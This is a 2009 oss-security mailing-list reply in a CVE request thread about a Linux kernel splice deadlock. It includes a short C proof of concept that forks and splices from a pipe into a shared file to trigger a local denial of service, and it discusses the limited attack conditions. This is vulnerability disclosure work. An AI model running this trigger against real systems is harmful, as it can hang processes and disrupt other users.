Date: Sat, 30 May 2009 03:36:30 -0400
From: Jon Oberheide <jon@...rheide.org>
To: oss-security@...ts.openwall.com
Cc: mszeredi@...ell.com
Subject: Re: CVE request: kernel: splice local denial of
 service

The deadlock can be reproduced easily (you might need to fork() a few
times to get an pipe inode allocation ptr less than the file inode ptr):

    pipe(pfds);
    snprintf(buf, sizeof(buf), "/tmp/%d", getpid());
    fd = open(buf, O_RDWR | O_CREAT, S_IRWXU);

    if (fork()) {
        splice(pfds[0], NULL, fd, NULL, 1024, NULL);
    } else{
        sleep(1);
        splice(pfds[0], NULL, fd, NULL, 1024, NULL);
    }

However, the deadlock only affects the task attempting to acquire the
inode's i_mutex, so an attacker would require write access to a file
that is also written (or other fs op that acquires i_mutex) by some
victim process.  That is, unless I've missed something. :-)

Regards,
Jon Oberheide

--
Jon Oberheide <jon@...rheide.org>
GnuPG Key: 1024D/F47C17FE

[ CONTENT OF TYPE application/pgp-signature SKIPPED ]